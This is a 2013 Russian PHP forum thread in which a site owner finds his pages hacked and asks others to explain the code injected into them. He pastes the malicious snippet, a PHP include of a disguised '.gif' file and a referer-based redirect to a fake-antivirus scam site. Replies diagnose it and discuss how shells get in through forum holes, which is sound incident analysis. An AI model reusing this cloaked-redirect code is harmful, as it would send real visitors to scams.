![]() |
|
Модераторы: skyboy, MoLeX, Aliance, ksnk |
![]()
|
|
| Chai |
|
||||
|
Новичок Профиль Группа: Участник Сообщений: 42 Регистрация: 12.10.2012 Репутация: нет Всего: нет |
Загружал уже давно в контент своего сайта обычные html-страницы. Решил пройтись с проверкой по контенту, смотрю, некоторые страницы были недавно изменены (по дате модификации выявил), а в конце (еще в теле, в самом конце) добавлены такие строки:
Кроме того, на сервер мне закинули директорию со страницами, раздающими некие сломанные программы) crack android navitel 5 5 crack cs4 illustrator crack finereader 10 crack genius driver И как часто сейчас встречаешь, типичные "комменты счастливых юзверей", вроде как А зачем при скачивании файла просит ввести номер? Это бесплатно!? Той же датой создания/модификации в корне лежал скриптовый файл *.js
Довески убрал, но чо за код был в конце страниц, что он делает? Может, где еще проверить надо? И какие функции выполнял скриптовый файл? Я хочу выяснить, может, еще кто проник, кто за свой собственный хостинг платить не хочет? Это сообщение отредактировал(а) Chai - 10.4.2013, 06:53 |
||||
|
|||||
| Чучмек |
|
|||
|
НЭТ БИЛЭТ ![]() ![]() Профиль Группа: Участник Сообщений: 841 Регистрация: 11.5.2008 Где: СССР Репутация: 4 Всего: 41 |
Chai, тебя взломали.
Проверяет откуда был переход - если переход был и не со страницы твоего сайта - перекидывает на base-file Это сообщение отредактировал(а) Чучмек - 10.4.2013, 11:34 -------------------- умную мысль держи при себе, а дурной - поделись с другими |
|||
|
||||
| Chai |
|
|||
|
Новичок Профиль Группа: Участник Сообщений: 42 Регистрация: 12.10.2012 Репутация: нет Всего: нет |
А почему им так важно, чтобы переход был не со страниц моего сайта? Что за ребятки эти?
Здесь он помечен в блэклисте. Так что я прям боюсь перейти, чтобы на них полюбоваться. Добавлено через 3 минуты и 44 секунды Блин, буду писать гневное письмо хостеру, что его антивирь, которым он регулярно проверяет контент, в упор не видит ни редиректов в хтакцессе, ни в этих довесках. |
|||
|
||||
| Sanchezzz |
|
|||
![]() Эксперт ![]() ![]() ![]() Профиль Группа: Завсегдатай Сообщений: 1670 Регистрация: 19.11.2006 Где: Voronezh Репутация: 41 Всего: 60 |
Ну скорее всего он ответит что у вас дрявые скрипты.
-------------------- Понравился ответ "+" по репе, не забываем закрывать тему, заказы в LS. |
|||
|
||||
| Chai |
|
|||
|
Хех, там из скриптов есть только классический phpBB3. На эту отмазку напишу ихнему главному. Им уже написал. Зачем нужна такая проверка, если она не находит эти гадости? Чем они проверяют, не знаю, а только один раз нашли PHP-вирус, а эти не находят. А ведь достаточно посмотреть в блэклисты, они не скрываются.
|
|||
|
||||
| Чучмек |
|
|||
|
НЭТ БИЛЭТ ![]() ![]() Профиль Группа: Участник Сообщений: 841 Регистрация: 11.5.2008 Где: СССР Репутация: 4 Всего: 41 |
Чтобы ты не догадался. Если вести адрес в браузер и переходить со страницы на страницу - все Ок. А если перейти на твой сайт по внешней ссылке,с поисковика например, то перекинет. Добавлено через 3 минуты и 15 секунд А че боятся? Компьютер не взорвется. Говорят у вас типа вирусы и предлагают проверить комп за SMS. -------------------- умную мысль держи при себе, а дурной - поделись с другими |
|||
|
||||
| Sanchezzz |
|
|||
![]() Эксперт ![]() ![]() ![]() Профиль Группа: Завсегдатай Сообщений: 1670 Регистрация: 19.11.2006 Где: Voronezh Репутация: 41 Всего: 60 |
Чаще и за дырок форумов и закачивают шелы, особенно если они крякнутые=).
-------------------- Понравился ответ "+" по репе, не забываем закрывать тему, заказы в LS. |
|||
|
||||
| Chai |
|
|||
|
Щас набрал в браузере адрес одной из страниц сайта и выполнил переход на нее.
Как она выглядит запечатлел во вложении, а код внизу нее такой <? require_once($_SERVER['DOCUMENT_ROOT'].'/group/case/mn_t.gif'); ?> <? if(isset($_SERVER['HTTP_REFERER']) && !preg_match("|^http://$_SERVER[HTTP_HOST]|i", $_SERVER['HTTP_REFERER'])){ exit( '<script>setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);</script>'); } ?></body> </html> Переход на base-file.com почему-то не выполнился. Почему? Присоединённый файл ( Кол-во скачиваний: 9 )
Низ_зараженной_страницы.JPG 12,35 Kb |
|||
|
||||
| krypt3r |
|
|||
|
Опытный ![]() ![]() Профиль Группа: Участник Сообщений: 359 Регистрация: 9.6.2009 Репутация: 3 Всего: 16 |
Кто крякнутый? Шелл или бесплатный phpBB? |
|||
|
||||
| MoLeX |
|
|||
![]() Местный пингвин ![]() ![]() ![]() ![]() Профиль Группа: Модератор Сообщений: 4076 Регистрация: 17.5.2007 Репутация: 46 Всего: 140 |
видно же что js скрипт не сработал.
-------------------- Amazing |
|||
|
||||
| Sanchezzz |
|
|||
Это в общем плане вы используете то что используют очень большое количество людей, каждая дырка даже в бесплатном форуме это угроза всему сайту.
Платные формы или крякнутые имеют уйму дыр. -------------------- Понравился ответ "+" по репе, не забываем закрывать тему, заказы в LS. |
|||
|
||||
| Chai |
|
|||
|
А, точно, я ж его прибил в корне еще ранее. Мне щас коллега сказал, что на его форум новый юзер поимел права админа, потому что зашел в браузере в каком-то лине. Форум от SMF. Как это может быть, в линях что-то иначе исполняется? Это сообщение отредактировал(а) Chai - 11.4.2013, 15:17 |
|||
|
||||
| Aliance |
|
|||
![]() I ♥ <script> ![]() ![]() ![]() ![]() Профиль Группа: Модератор Сообщений: 6418 Регистрация: 2.8.2004 Где: spb Репутация: 14 Всего: 137 |
||||
|
||||
| Chai |
|
|||
|
В линуксе.
|
|||
|
||||
| MoLeX |
|
|||
![]() Местный пингвин ![]() ![]() ![]() ![]() Профиль Группа: Модератор Сообщений: 4076 Регистрация: 17.5.2007 Репутация: 46 Всего: 140 |
))))))
взлом сайта через линкус. забавно -------------------- Amazing |
|||
|
||||
![]()
|
| Правила форума "PHP" | |
|
|
Новичкам:
Важно:
Внимание:
Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, IZ@TOP, skyboy, SamDark, MoLeX, awers. |
| 0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей) | |
| 0 Пользователей: | |
| « Предыдущая тема | PHP: Общие вопросы | Следующая тема » |
|
|
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности Powered by Invision Power Board(R) 1.3 © 2003 IPS, Inc. |